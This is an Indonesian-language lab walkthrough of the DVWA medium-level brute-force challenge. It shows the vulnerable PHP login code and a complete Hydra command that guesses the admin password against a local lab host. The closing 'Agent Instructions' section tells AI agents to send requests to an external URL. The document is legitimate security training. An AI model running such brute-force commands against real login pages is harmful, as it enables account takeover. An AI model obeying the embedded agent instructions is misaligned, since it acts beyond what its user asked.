# Medium

Di bawah ini adalah *source-code* dari form login level medium di DVWA.

```php
vulnerabilities/brute/source/medium.php
<?php
​
if( isset( $_GET[ 'Login' ] ) ) {
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
​
    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );
​
    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
​
    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];
​
        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( 2 );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }
​
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
​
?>
```

## Mencari Informasi <a href="#mencari-informasi" id="mencari-informasi"></a>

Tidak jauh berbeda dengan level sebelumnya, hanya saja ketika gagal melakukan login akan ada jeda selama 2 detik (terlihat di baris ke-28).

Dan jika di cek menggunakan Burpsuite, yang berubah hanyalah nilai dari *cookie* `security`.

![](https://gblobscdn.gitbook.com/assets%2F-LzH5Vfe8_AlGL8KPrs2%2F-LzLORQjEljieIBJY-0a%2F-LzLXTEAR0D03PpPcJ2V%2FDeepinScreenshot_select-area_20200124145224.png?alt=media\&token=33fc8508-909c-4ad7-9f05-34d0612b5ebe)

## Melakukan Serangan <a href="#melakukan-serangan" id="melakukan-serangan"></a>

Karena tidak jauh berbeda dengan level yang sebelumnya, maka kita masih menggunakan perintah yang sama seperti sebelumnya, hanya saja nilai dari `security` pada *cookie* kita rubah menjadi "*medium*".

```
hydra 172.17.0.2 -l admin -P DVWA-Wordlist.txt http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie:PHPSESSID=77jr5376ldag1qc392brdr2b11; security=medium"
```

![](https://gblobscdn.gitbook.com/assets%2F-LzH5Vfe8_AlGL8KPrs2%2F-LzLORQjEljieIBJY-0a%2F-LzLYyfFCA4ZfWa0rGAl%2FDeepinScreenshot_select-area_20200124145858.png?alt=media\&token=583ec82d-540b-475c-b0a6-b8024516d8ca)

Hasilnya sama seperti sebelumnya, tetapi proses kali ini akan lebih lama karena akan terjadi *delay* 2 detik ketika gagal melakukan login.

Selamat! Kita berhasil dan akan lanjut ke level berikutnya.<br>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.anggipradana.com/tutorial/dvwa/brute-force/medium.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.